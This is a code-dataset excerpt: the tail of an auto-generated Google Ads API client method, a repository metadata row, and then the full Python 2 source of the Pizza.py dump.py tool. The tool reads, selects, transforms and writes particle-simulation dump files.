return response
def mutate_feed_item_sets(self,
request: feed_item_set_service.MutateFeedItemSetsRequest = None,
*,
customer_id: str = None,
operations: Sequence[feed_item_set_service.FeedItemSetOperation] = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> feed_item_set_service.MutateFeedItemSetsResponse:
r"""Creates, updates or removes feed item sets. Operation statuses
are returned.
List of thrown errors: `AuthenticationError <>`__
`AuthorizationError <>`__ `HeaderError <>`__
`InternalError <>`__ `MutateError <>`__ `QuotaError <>`__
`RequestError <>`__
Args:
request (:class:`google.ads.googleads.v8.services.types.MutateFeedItemSetsRequest`):
The request object. Request message for
[FeedItemSetService.MutateFeedItemSets][google.ads.googleads.v8.services.FeedItemSetService.MutateFeedItemSets].
customer_id (:class:`str`):
Required. The ID of the customer
whose feed item sets are being modified.
This corresponds to the ``customer_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
operations (:class:`Sequence[google.ads.googleads.v8.services.types.FeedItemSetOperation]`):
Required. The list of operations to
perform on individual feed item sets.
This corresponds to the ``operations`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.ads.googleads.v8.services.types.MutateFeedItemSetsResponse:
Response message for an feed item set
mutate.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
if request is not None and any([customer_id, operations]):
raise ValueError('If the `request` argument is set, then none of '
'the individual field arguments should be set.')
# Minor optimization to avoid making a copy if the user passes
# in a feed_item_set_service.MutateFeedItemSetsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, feed_item_set_service.MutateFeedItemSetsRequest):
request = feed_item_set_service.MutateFeedItemSetsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if customer_id is not None:
request.customer_id = customer_id
if operations is not None:
request.operations = operations
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.mutate_feed_item_sets]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((
('customer_id', request.customer_id),
)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
__all__ = (
'FeedItemSetServiceClient',
)
| apache-2.0 | -877,402,544,972,360,700 | 43.794118 | 168 | 0.621536 | false |
tm1249wk/WASHLIGGGHTS-3.3.x | python/examples/pizza/dump.py | 36 | 40308 | # Pizza.py toolkit, www.cs.sandia.gov/~sjplimp/pizza.html
# Steve Plimpton, [email protected], Sandia National Laboratories
#
# Copyright (2005) Sandia Corporation. Under the terms of Contract
# DE-AC04-94AL85000 with Sandia Corporation, the U.S. Government retains
# certain rights in this software. This software is distributed under
# the GNU General Public License.
# dump tool
oneline = "Read, write, manipulate dump files and particle attributes"
docstr = """
d = dump("dump.one") read in one or more dump files
d = dump("dump.1 dump.2.gz") can be gzipped
d = dump("dump.*") wildcard expands to multiple files
d = dump("dump.*",0) two args = store filenames, but don't read
incomplete and duplicate snapshots are deleted
if atoms have 5 or 8 columns, assign id,type,x,y,z (ix,iy,iz)
atoms will be unscaled if stored in files as scaled
time = d.next() read next snapshot from dump files
used with 2-argument constructor to allow reading snapshots one-at-a-time
snapshot will be skipped only if another snapshot has same time stamp
return time stamp of snapshot read
return -1 if no snapshots left or last snapshot is incomplete
no column name assignment or unscaling is performed
d.map(1,"id",3,"x") assign names to atom columns (1-N)
not needed if dump file is self-describing
d.tselect.all() select all timesteps
d.tselect.one(N) select only timestep N
d.tselect.none() deselect all timesteps
d.tselect.skip(M) select every Mth step
d.tselect.test("$t >= 100 and $t < 10000") select matching timesteps
d.delete() delete non-selected timesteps
selecting a timestep also selects all atoms in the timestep
skip() and test() only select from currently selected timesteps
test() uses a Python Boolean expression with $t for timestep value
Python comparison syntax: == != < > <= >= and or
d.aselect.all() select all atoms in all steps
d.aselect.all(N) select all atoms in one step
d.aselect.test("$id > 100 and $type == 2") select match atoms in all steps
d.aselect.test("$id > 100 and $type == 2",N) select matching atoms in one step
all() with no args selects atoms from currently selected timesteps
test() with one arg selects atoms from currently selected timesteps
test() sub-selects from currently selected atoms
test() uses a Python Boolean expression with $ for atom attributes
Python comparison syntax: == != < > <= >= and or
$name must end with a space
d.write("file") write selected steps/atoms to dump file
d.write("file",head,app) write selected steps/atoms to dump file
d.scatter("tmp") write selected steps/atoms to multiple files
write() can be specified with 2 additional flags
headd = 0/1 for no/yes snapshot header, app = 0/1 for write vs append
scatter() files are given timestep suffix: e.g. tmp.0, tmp.100, etc
d.scale() scale x,y,z to 0-1 for all timesteps
d.scale(100) scale atom coords for timestep N
d.unscale() unscale x,y,z to box size to all timesteps
d.unscale(1000) unscale atom coords for timestep N
d.wrap() wrap x,y,z into periodic box via ix,iy,iz
d.unwrap() unwrap x,y,z out of box via ix,iy,iz
d.owrap("other") wrap x,y,z to same image as another atom
d.sort() sort atoms by atom ID in all selected steps
d.sort("x") sort atoms by column value in all steps
d.sort(1000) sort atoms in timestep N
scale(), unscale(), wrap(), unwrap(), owrap() operate on all steps and atoms
wrap(), unwrap(), owrap() require ix,iy,iz be defined
owrap() requires a column be defined which contains an atom ID
name of that column is the argument to owrap()
x,y,z for each atom is wrapped to same image as the associated atom ID
useful for wrapping all molecule's atoms the same so it is contiguous
m1,m2 = d.minmax("type") find min/max values for a column
d.set("$ke = $vx * $vx + $vy * $vy") set a column to a computed value
d.setv("type",vector) set a column to a vector of values
d.spread("ke",N,"color") 2nd col = N ints spread over 1st col
d.clone(1000,"color") clone timestep N values to other steps
minmax() operates on selected timesteps and atoms
set() operates on selected timesteps and atoms
left hand side column is created if necessary
left-hand side column is unset or unchanged for non-selected atoms
equation is in Python syntax
use $ for column names, $name must end with a space
setv() operates on selected timesteps and atoms
if column label does not exist, column is created
values in vector are assigned sequentially to atoms, so may want to sort()
length of vector must match # of selected atoms
spread() operates on selected timesteps and atoms
min and max are found for 1st specified column across all selected atoms
atom's value is linear mapping (1-N) between min and max
that is stored in 2nd column (created if needed)
useful for creating a color map
clone() operates on selected timesteps and atoms
values at every timestep are set to value at timestep N for that atom ID
useful for propagating a color map
t = d.time() return vector of selected timestep values
fx,fy,... = d.atom(100,"fx","fy",...) return vector(s) for atom ID N
fx,fy,... = d.vecs(1000,"fx","fy",...) return vector(s) for timestep N
atom() returns vectors with one value for each selected timestep
vecs() returns vectors with one value for each selected atom in the timestep
index,time,flag = d.iterator(0/1) loop over dump snapshots
time,box,atoms,bonds,tris = d.viz(index) return list of viz objects
d.atype = "color" set column returned as "type" by viz
d.extra("dump.bond") read bond list from dump file
d.extra(data) extract bond/tri/line list from data
iterator() loops over selected timesteps
iterator() called with arg = 0 first time, with arg = 1 on subsequent calls
index = index within dump object (0 to # of snapshots)
time = timestep value
flag = -1 when iteration is done, 1 otherwise
viz() returns info for selected atoms for specified timestep index
time = timestep value
box = [xlo,ylo,zlo,xhi,yhi,zhi]
atoms = id,type,x,y,z for each atom as 2d array
bonds = id,type,x1,y1,z1,x2,y2,z2,t1,t2 for each bond as 2d array
if bonds() was used to define bonds, else empty list
tris = id,type,x1,y1,z1,x2,y2,z2,x3,y3,z3,nx,ny,nz for each tri as 2d array
if extra() was used to define tris, else empty list
lines = id,type,x1,y1,z1,x2,y2,z2 for each line as 2d array
if extra() was used to define lines, else empty list
atype is column name viz() will return as atom type (def = "type")
extra() stores list of bonds/tris/lines to return each time viz() is called
"""
# History
# 8/05, Steve Plimpton (SNL): original version
# 12/09, David Hart (SNL): allow use of NumPy or Numeric
# ToDo list
# try to optimize this line in read_snap: words += f.readline().split()
# allow $name in aselect.test() and set() to end with non-space
# should next() snapshot be auto-unscaled ?
# Variables
# flist = list of dump file names
# increment = 1 if reading snapshots one-at-a-time
# nextfile = which file to read from via next()
# eof = ptr into current file for where to read via next()
# nsnaps = # of snapshots
# nselect = # of selected snapshots
# snaps = list of snapshots
# names = dictionary of column names:
# key = "id", value = column # (0 to M-1)
# tselect = class for time selection
# aselect = class for atom selection
# atype = name of vector used as atom type by viz extract
# bondflag = 0 if no bonds, 1 if they are defined statically
# bondlist = static list of bonds to viz() return for all snapshots
# only a list of atom pairs, coords have to be created for each snapshot
# triflag = 0 if no tris, 1 if they are defined statically, 2 if dynamic
# trilist = static list of tris to return via viz() for all snapshots
# lineflag = 0 if no lines, 1 if they are defined statically
# linelist = static list of lines to return via viz() for all snapshots
# Snap = one snapshot
# time = time stamp
# tselect = 0/1 if this snapshot selected
# natoms = # of atoms
# nselect = # of selected atoms in this snapshot
# aselect[i] = 0/1 for each atom
# xlo,xhi,ylo,yhi,zlo,zhi = box bounds (float)
# atoms[i][j] = 2d array of floats, i = 0 to natoms-1, j = 0 to ncols-1
# Imports and external programs
import sys, commands, re, glob, types
from os import popen
from math import * # any function could be used by set()
try:
import numpy as np
oldnumeric = False
except:
import Numeric as np
oldnumeric = True
try: from DEFAULTS import PIZZA_GUNZIP
except: PIZZA_GUNZIP = "gunzip"
# Class definition
class dump:
# --------------------------------------------------------------------
def __init__(self,*list):
self.snaps = []
self.nsnaps = self.nselect = 0
self.names = {}
self.tselect = tselect(self)
self.aselect = aselect(self)
self.atype = "type"
self.bondflag = 0
self.bondlist = []
self.triflag = 0
self.trilist = []
self.triobj = 0
self.lineflag = 0
self.linelist = []
# flist = list of all dump file names
words = list[0].split()
self.flist = []
for word in words: self.flist += glob.glob(word)
if len(self.flist) == 0 and len(list) == 1:
raise StandardError,"no dump file specified"
if len(list) == 1:
self.increment = 0
self.read_all()
else:
self.increment = 1
self.nextfile = 0
self.eof = 0
# --------------------------------------------------------------------
def read_all(self):
# read all snapshots from each file
# test for gzipped files
for file in self.flist:
if file[-3:] == ".gz":
f = popen("%s -c %s" % (PIZZA_GUNZIP,file),'r')
else: f = open(file)
snap = self.read_snapshot(f)
while snap:
self.snaps.append(snap)
print snap.time,
sys.stdout.flush()
snap = self.read_snapshot(f)
f.close()
print
# sort entries by timestep, cull duplicates
self.snaps.sort(self.compare_time)
self.cull()
self.nsnaps = len(self.snaps)
print "read %d snapshots" % self.nsnaps
# select all timesteps and atoms
self.tselect.all()
# set default names for atom columns if file wasn't self-describing
if len(self.snaps) == 0:
print "no column assignments made"
elif len(self.names):
print "assigned columns:",self.names2str()
elif self.snaps[0].atoms == None:
print "no column assignments made"
elif len(self.snaps[0].atoms[0]) == 5:
self.map(1,"id",2,"type",3,"x",4,"y",5,"z")
print "assigned columns:",self.names2str()
elif len(self.snaps[0].atoms[0]) == 8:
self.map(1,"id",2,"type",3,"x",4,"y",5,"z",6,"ix",7,"iy",8,"iz")
print "assigned columns:",self.names2str()
else:
print "no column assignments made"
# if snapshots are scaled, unscale them
if (not self.names.has_key("x")) or \
(not self.names.has_key("y")) or \
(not self.names.has_key("z")):
print "no unscaling could be performed"
elif self.nsnaps > 0:
if self.scaled(self.nsnaps-1): self.unscale()
else: print "dump is already unscaled"
# --------------------------------------------------------------------
# read next snapshot from list of files
def next(self):
if not self.increment: raise StandardError,"cannot read incrementally"
# read next snapshot in current file using eof as pointer
# if fail, try next file
# if new snapshot time stamp already exists, read next snapshot
while 1:
f = open(self.flist[self.nextfile],'rb')
f.seek(self.eof)
snap = self.read_snapshot(f)
if not snap:
self.nextfile += 1
if self.nextfile == len(self.flist): return -1
f.close()
self.eof = 0
continue
self.eof = f.tell()
f.close()
try:
self.findtime(snap.time)
continue
except: break
# select the new snapshot with all its atoms
self.snaps.append(snap)
snap = self.snaps[self.nsnaps]
snap.tselect = 1
snap.nselect = snap.natoms
for i in xrange(snap.natoms): snap.aselect[i] = 1
self.nsnaps += 1
self.nselect += 1
return snap.time
# --------------------------------------------------------------------
# read a single snapshot from file f
# return snapshot or 0 if failed
# assign column names if not already done and file is self-describing
# convert xs,xu to x
def read_snapshot(self,f):
try:
snap = Snap()
item = f.readline()
snap.time = int(f.readline().split()[0]) # just grab 1st field
item = f.readline()
snap.natoms = int(f.readline())
snap.aselect = np.zeros(snap.natoms)
item = f.readline()
words = f.readline().split()
snap.xlo,snap.xhi = float(words[0]),float(words[1])
words = f.readline().split()
snap.ylo,snap.yhi = float(words[0]),float(words[1])
words = f.readline().split()
snap.zlo,snap.zhi = float(words[0]),float(words[1])
item = f.readline()
if len(self.names) == 0:
words = item.split()[2:]
if len(words):
for i in range(len(words)):
if words[i] == "xs" or words[i] == "xu":
self.names["x"] = i
elif words[i] == "ys" or words[i] == "yu":
self.names["y"] = i
elif words[i] == "zs" or words[i] == "zu":
self.names["z"] = i
else: self.names[words[i]] = i
if snap.natoms:
words = f.readline().split()
ncol = len(words)
for i in xrange(1,snap.natoms):
words += f.readline().split()
floats = map(float,words)
if oldnumeric: atoms = np.zeros((snap.natoms,ncol),np.Float)
else: atoms = np.zeros((snap.natoms,ncol),np.float)
start = 0
stop = ncol
for i in xrange(snap.natoms):
atoms[i] = floats[start:stop]
start = stop
stop += ncol
else: atoms = None
snap.atoms = atoms
return snap
except:
return 0
# --------------------------------------------------------------------
# decide if snapshot i is scaled/unscaled from coords of first and last atom
def scaled(self,i):
ix = self.names["x"]
iy = self.names["y"]
iz = self.names["z"]
natoms = self.snaps[i].natoms
if natoms == 0: return 0
x1 = self.snaps[i].atoms[0][ix]
y1 = self.snaps[i].atoms[0][iy]
z1 = self.snaps[i].atoms[0][iz]
x2 = self.snaps[i].atoms[natoms-1][ix]
y2 = self.snaps[i].atoms[natoms-1][iy]
z2 = self.snaps[i].atoms[natoms-1][iz]
if x1 >= -0.1 and x1 <= 1.1 and y1 >= -0.1 and y1 <= 1.1 and \
z1 >= -0.1 and z1 <= 1.1 and x2 >= -0.1 and x2 <= 1.1 and \
y2 >= -0.1 and y2 <= 1.1 and z2 >= -0.1 and z2 <= 1.1:
return 1
else: return 0
# --------------------------------------------------------------------
# map atom column names
def map(self,*pairs):
if len(pairs) % 2 != 0:
raise StandardError, "dump map() requires pairs of mappings"
for i in range(0,len(pairs),2):
j = i + 1
self.names[pairs[j]] = pairs[i]-1
# delete unselected snapshots
# --------------------------------------------------------------------
def delete(self):
ndel = i = 0
while i < self.nsnaps:
if not self.snaps[i].tselect:
del self.snaps[i]
self.nsnaps -= 1
ndel += 1
else: i += 1
print "%d snapshots deleted" % ndel
print "%d snapshots remaining" % self.nsnaps
# --------------------------------------------------------------------
# scale coords to 0-1 for all snapshots or just one
def scale(self,*list):
if len(list) == 0:
print "Scaling dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
for snap in self.snaps: self.scale_one(snap,x,y,z)
else:
i = self.findtime(list[0])
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
self.scale_one(self.snaps[i],x,y,z)
# --------------------------------------------------------------------
def scale_one(self,snap,x,y,z):
xprdinv = 1.0 / (snap.xhi - snap.xlo)
yprdinv = 1.0 / (snap.yhi - snap.ylo)
zprdinv = 1.0 / (snap.zhi - snap.zlo)
atoms = snap.atoms
atoms[:,x] = (atoms[:,x] - snap.xlo) * xprdinv
atoms[:,y] = (atoms[:,y] - snap.ylo) * yprdinv
atoms[:,z] = (atoms[:,z] - snap.zlo) * zprdinv
# --------------------------------------------------------------------
# unscale coords from 0-1 to box size for all snapshots or just one
def unscale(self,*list):
if len(list) == 0:
print "Unscaling dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
for snap in self.snaps: self.unscale_one(snap,x,y,z)
else:
i = self.findtime(list[0])
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
self.unscale_one(self.snaps[i],x,y,z)
# --------------------------------------------------------------------
def unscale_one(self,snap,x,y,z):
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
atoms[:,x] = snap.xlo + atoms[:,x]*xprd
atoms[:,y] = snap.ylo + atoms[:,y]*yprd
atoms[:,z] = snap.zlo + atoms[:,z]*zprd
# --------------------------------------------------------------------
# wrap coords from outside box to inside
def wrap(self):
print "Wrapping dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
ix = self.names["ix"]
iy = self.names["iy"]
iz = self.names["iz"]
for snap in self.snaps:
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
atoms[:,x] -= atoms[:,ix]*xprd
atoms[:,y] -= atoms[:,iy]*yprd
atoms[:,z] -= atoms[:,iz]*zprd
# --------------------------------------------------------------------
# unwrap coords from inside box to outside
def unwrap(self):
print "Unwrapping dump ..."
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
ix = self.names["ix"]
iy = self.names["iy"]
iz = self.names["iz"]
for snap in self.snaps:
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
atoms[:,x] += atoms[:,ix]*xprd
atoms[:,y] += atoms[:,iy]*yprd
atoms[:,z] += atoms[:,iz]*zprd
# --------------------------------------------------------------------
# wrap coords to same image as atom ID stored in "other" column
def owrap(self,other):
print "Wrapping to other ..."
id = self.names["id"]
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
ix = self.names["ix"]
iy = self.names["iy"]
iz = self.names["iz"]
iother = self.names[other]
for snap in self.snaps:
xprd = snap.xhi - snap.xlo
yprd = snap.yhi - snap.ylo
zprd = snap.zhi - snap.zlo
atoms = snap.atoms
ids = {}
for i in xrange(snap.natoms):
ids[atoms[i][id]] = i
for i in xrange(snap.natoms):
j = ids[atoms[i][iother]]
atoms[i][x] += (atoms[i][ix]-atoms[j][ix])*xprd
atoms[i][y] += (atoms[i][iy]-atoms[j][iy])*yprd
atoms[i][z] += (atoms[i][iz]-atoms[j][iz])*zprd
# --------------------------------------------------------------------
# convert column names assignment to a string, in column order
def names2str(self):
ncol = len(self.snaps[0].atoms[0])
pairs = self.names.items()
values = self.names.values()
str = ""
for i in xrange(ncol):
if i in values: str += pairs[values.index(i)][0] + ' '
return str
# --------------------------------------------------------------------
# sort atoms by atom ID in all selected timesteps by default
# if arg = string, sort all steps by that column
# if arg = numeric, sort atoms in single step
def sort(self,*list):
if len(list) == 0:
print "Sorting selected snapshots ..."
id = self.names["id"]
for snap in self.snaps:
if snap.tselect: self.sort_one(snap,id)
elif type(list[0]) is types.StringType:
print "Sorting selected snapshots by %s ..." % list[0]
id = self.names[list[0]]
for snap in self.snaps:
if snap.tselect: self.sort_one(snap,id)
else:
i = self.findtime(list[0])
id = self.names["id"]
self.sort_one(self.snaps[i],id)
# --------------------------------------------------------------------
# sort a single snapshot by ID column
def sort_one(self,snap,id):
atoms = snap.atoms
ids = atoms[:,id]
ordering = np.argsort(ids)
for i in xrange(len(atoms[0])):
atoms[:,i] = np.take(atoms[:,i],ordering)
# --------------------------------------------------------------------
# write a single dump file from current selection
def write(self,file,header=1,append=0):
if len(self.snaps): namestr = self.names2str()
if not append: f = open(file,"w")
else: f = open(file,"a")
for snap in self.snaps:
if not snap.tselect: continue
print snap.time,
sys.stdout.flush()
if header:
print >>f,"ITEM: TIMESTEP"
print >>f,snap.time
print >>f,"ITEM: NUMBER OF ATOMS"
print >>f,snap.nselect
print >>f,"ITEM: BOX BOUNDS"
print >>f,snap.xlo,snap.xhi
print >>f,snap.ylo,snap.yhi
print >>f,snap.zlo,snap.zhi
print >>f,"ITEM: ATOMS",namestr
atoms = snap.atoms
nvalues = len(atoms[0])
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
line = ""
for j in xrange(nvalues):
if (j < 2):
line += str(int(atoms[i][j])) + " "
else:
line += str(atoms[i][j]) + " "
print >>f,line
f.close()
print "\n%d snapshots" % self.nselect
# --------------------------------------------------------------------
# write one dump file per snapshot from current selection
def scatter(self,root):
if len(self.snaps): namestr = self.names2str()
for snap in self.snaps:
if not snap.tselect: continue
print snap.time,
sys.stdout.flush()
file = root + "." + str(snap.time)
f = open(file,"w")
print >>f,"ITEM: TIMESTEP"
print >>f,snap.time
print >>f,"ITEM: NUMBER OF ATOMS"
print >>f,snap.nselect
print >>f,"ITEM: BOX BOUNDS"
print >>f,snap.xlo,snap.xhi
print >>f,snap.ylo,snap.yhi
print >>f,snap.zlo,snap.zhi
print >>f,"ITEM: ATOMS",namestr
atoms = snap.atoms
nvalues = len(atoms[0])
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
line = ""
for j in xrange(nvalues):
if (j < 2):
line += str(int(atoms[i][j])) + " "
else:
line += str(atoms[i][j]) + " "
print >>f,line
f.close()
print "\n%d snapshots" % self.nselect
# --------------------------------------------------------------------
# find min/max across all selected snapshots/atoms for a particular column
def minmax(self,colname):
icol = self.names[colname]
min = 1.0e20
max = -min
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
if atoms[i][icol] < min: min = atoms[i][icol]
if atoms[i][icol] > max: max = atoms[i][icol]
return (min,max)
# --------------------------------------------------------------------
# set a column value via an equation for all selected snapshots
def set(self,eq):
print "Setting ..."
pattern = "\$\w*"
list = re.findall(pattern,eq)
lhs = list[0][1:]
if not self.names.has_key(lhs):
self.newcolumn(lhs)
for item in list:
name = item[1:]
column = self.names[name]
insert = "snap.atoms[i][%d]" % (column)
eq = eq.replace(item,insert)
ceq = compile(eq,'','single')
for snap in self.snaps:
if not snap.tselect: continue
for i in xrange(snap.natoms):
if snap.aselect[i]: exec ceq
# --------------------------------------------------------------------
# set a column value via an input vec for all selected snapshots/atoms
def setv(self,colname,vec):
print "Setting ..."
if not self.names.has_key(colname):
self.newcolumn(colname)
icol = self.names[colname]
for snap in self.snaps:
if not snap.tselect: continue
if snap.nselect != len(vec):
raise StandardError,"vec length does not match # of selected atoms"
atoms = snap.atoms
m = 0
for i in xrange(snap.natoms):
if snap.aselect[i]:
atoms[i][icol] = vec[m]
m += 1
# --------------------------------------------------------------------
# clone value in col across selected timesteps for atoms with same ID
def clone(self,nstep,col):
istep = self.findtime(nstep)
icol = self.names[col]
id = self.names["id"]
ids = {}
for i in xrange(self.snaps[istep].natoms):
ids[self.snaps[istep].atoms[i][id]] = i
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
j = ids[atoms[i][id]]
atoms[i][icol] = self.snaps[istep].atoms[j][icol]
# --------------------------------------------------------------------
# values in old column are spread as ints from 1-N and assigned to new column
def spread(self,old,n,new):
iold = self.names[old]
if not self.names.has_key(new): self.newcolumn(new)
inew = self.names[new]
min,max = self.minmax(old)
print "min/max = ",min,max
gap = max - min
invdelta = n/gap
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
ivalue = int((atoms[i][iold] - min) * invdelta) + 1
if ivalue > n: ivalue = n
if ivalue < 1: ivalue = 1
atoms[i][inew] = ivalue
# --------------------------------------------------------------------
# return vector of selected snapshot time stamps
def time(self):
vec = self.nselect * [0]
i = 0
for snap in self.snaps:
if not snap.tselect: continue
vec[i] = snap.time
i += 1
return vec
# --------------------------------------------------------------------
# extract vector(s) of values for atom ID n at each selected timestep
def atom(self,n,*list):
if len(list) == 0:
raise StandardError, "no columns specified"
columns = []
values = []
for name in list:
columns.append(self.names[name])
values.append(self.nselect * [0])
ncol = len(columns)
id = self.names["id"]
m = 0
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if atoms[i][id] == n: break
if atoms[i][id] != n:
raise StandardError, "could not find atom ID in snapshot"
for j in xrange(ncol):
values[j][m] = atoms[i][columns[j]]
m += 1
if len(list) == 1: return values[0]
else: return values
# --------------------------------------------------------------------
# extract vector(s) of values for selected atoms at chosen timestep
def vecs(self,n,*list):
snap = self.snaps[self.findtime(n)]
if len(list) == 0:
raise StandardError, "no columns specified"
columns = []
values = []
for name in list:
columns.append(self.names[name])
values.append(snap.nselect * [0])
ncol = len(columns)
m = 0
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
for j in xrange(ncol):
values[j][m] = snap.atoms[i][columns[j]]
m += 1
if len(list) == 1: return values[0]
else: return values
# --------------------------------------------------------------------
# add a new column to every snapshot and set value to 0
# set the name of the column to str
def newcolumn(self,str):
ncol = len(self.snaps[0].atoms[0])
self.map(ncol+1,str)
for snap in self.snaps:
atoms = snap.atoms
if oldnumeric: newatoms = np.zeros((snap.natoms,ncol+1),np.Float)
else: newatoms = np.zeros((snap.natoms,ncol+1),np.float)
newatoms[:,0:ncol] = snap.atoms
snap.atoms = newatoms
# --------------------------------------------------------------------
# sort snapshots on time stamp
def compare_time(self,a,b):
if a.time < b.time:
return -1
elif a.time > b.time:
return 1
else:
return 0
# --------------------------------------------------------------------
# delete successive snapshots with duplicate time stamp
def cull(self):
i = 1
while i < len(self.snaps):
if self.snaps[i].time == self.snaps[i-1].time:
del self.snaps[i]
else:
i += 1
# --------------------------------------------------------------------
# iterate over selected snapshots
def iterator(self,flag):
start = 0
if flag: start = self.iterate + 1
for i in xrange(start,self.nsnaps):
if self.snaps[i].tselect:
self.iterate = i
return i,self.snaps[i].time,1
return 0,0,-1
# --------------------------------------------------------------------
# return list of atoms to viz for snapshot isnap
# augment with bonds, tris, lines if extra() was invoked
def viz(self,isnap):
snap = self.snaps[isnap]
time = snap.time
box = [snap.xlo,snap.ylo,snap.zlo,snap.xhi,snap.yhi,snap.zhi]
id = self.names["id"]
type = self.names[self.atype]
x = self.names["x"]
y = self.names["y"]
z = self.names["z"]
# create atom list needed by viz from id,type,x,y,z
# need Numeric/Numpy mode here
atoms = []
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
atom = snap.atoms[i]
atoms.append([atom[id],atom[type],atom[x],atom[y],atom[z]])
# create list of current bond coords from static bondlist
# alist = dictionary of atom IDs for atoms list
# lookup bond atom IDs in alist and grab their coords
# try is used since some atoms may be unselected
# any bond with unselected atom is not returned to viz caller
# need Numeric/Numpy mode here
bonds = []
if self.bondflag:
alist = {}
for i in xrange(len(atoms)): alist[int(atoms[i][0])] = i
for bond in self.bondlist:
try:
i = alist[bond[2]]
j = alist[bond[3]]
atom1 = atoms[i]
atom2 = atoms[j]
bonds.append([bond[0],bond[1],atom1[2],atom1[3],atom1[4],
atom2[2],atom2[3],atom2[4],atom1[1],atom2[1]])
except: continue
tris = []
if self.triflag:
if self.triflag == 1: tris = self.trilist
elif self.triflag == 2:
timetmp,boxtmp,atomstmp,bondstmp, \
tris,linestmp = self.triobj.viz(time,1)
lines = []
if self.lineflag: lines = self.linelist
return time,box,atoms,bonds,tris,lines
# --------------------------------------------------------------------
def findtime(self,n):
for i in xrange(self.nsnaps):
if self.snaps[i].time == n: return i
raise StandardError, "no step %d exists" % n
# --------------------------------------------------------------------
# return maximum box size across all selected snapshots
def maxbox(self):
xlo = ylo = zlo = None
xhi = yhi = zhi = None
for snap in self.snaps:
if not snap.tselect: continue
if xlo == None or snap.xlo < xlo: xlo = snap.xlo
if xhi == None or snap.xhi > xhi: xhi = snap.xhi
if ylo == None or snap.ylo < ylo: ylo = snap.ylo
if yhi == None or snap.yhi > yhi: yhi = snap.yhi
if zlo == None or snap.zlo < zlo: zlo = snap.zlo
if zhi == None or snap.zhi > zhi: zhi = snap.zhi
return [xlo,ylo,zlo,xhi,yhi,zhi]
# --------------------------------------------------------------------
# return maximum atom type across all selected snapshots and atoms
def maxtype(self):
icol = self.names["type"]
max = 0
for snap in self.snaps:
if not snap.tselect: continue
atoms = snap.atoms
for i in xrange(snap.natoms):
if not snap.aselect[i]: continue
if atoms[i][icol] > max: max = atoms[i][icol]
return int(max)
# --------------------------------------------------------------------
# grab bonds/tris/lines from another object
def extra(self,arg):
# read bonds from bond dump file
if type(arg) is types.StringType:
try:
f = open(arg,'r')
item = f.readline()
time = int(f.readline())
item = f.readline()
nbonds = int(f.readline())
item = f.readline()
if not re.search("BONDS",item):
raise StandardError, "could not read bonds from dump file"
words = f.readline().split()
ncol = len(words)
for i in xrange(1,nbonds):
words += f.readline().split()
f.close()
# convert values to int and absolute value since can be negative types
if oldnumeric: bondlist = np.zeros((nbonds,4),np.Int)
else: bondlist = np.zeros((nbonds,4),np.int)
ints = [abs(int(value)) for value in words]
start = 0
stop = 4
for i in xrange(nbonds):
bondlist[i] = ints[start:stop]
start += ncol
stop += ncol
if bondlist:
self.bondflag = 1
self.bondlist = bondlist
except:
raise StandardError,"could not read from bond dump file"
# request bonds from data object
elif type(arg) is types.InstanceType and ".data" in str(arg.__class__):
try:
bondlist = []
bondlines = arg.sections["Bonds"]
for line in bondlines:
words = line.split()
bondlist.append([int(words[0]),int(words[1]),
int(words[2]),int(words[3])])
if bondlist:
self.bondflag = 1
self.bondlist = bondlist
except:
raise StandardError,"could not extract bonds from data object"
# request tris/lines from cdata object
elif type(arg) is types.InstanceType and ".cdata" in str(arg.__class__):
try:
tmp,tmp,tmp,tmp,tris,lines = arg.viz(0)
if tris:
self.triflag = 1
self.trilist = tris
if lines:
self.lineflag = 1
self.linelist = lines
except:
raise StandardError,"could not extract tris/lines from cdata object"
# request tris from mdump object
elif type(arg) is types.InstanceType and ".mdump" in str(arg.__class__):
try:
self.triflag = 2
self.triobj = arg
except:
raise StandardError,"could not extract tris from mdump object"
else:
raise StandardError,"unrecognized argument to dump.extra()"
# --------------------------------------------------------------------
def compare_atom(self,a,b):
if a[0] < b[0]:
return -1
elif a[0] > b[0]:
return 1
else:
return 0
# --------------------------------------------------------------------
# one snapshot
class Snap:
pass
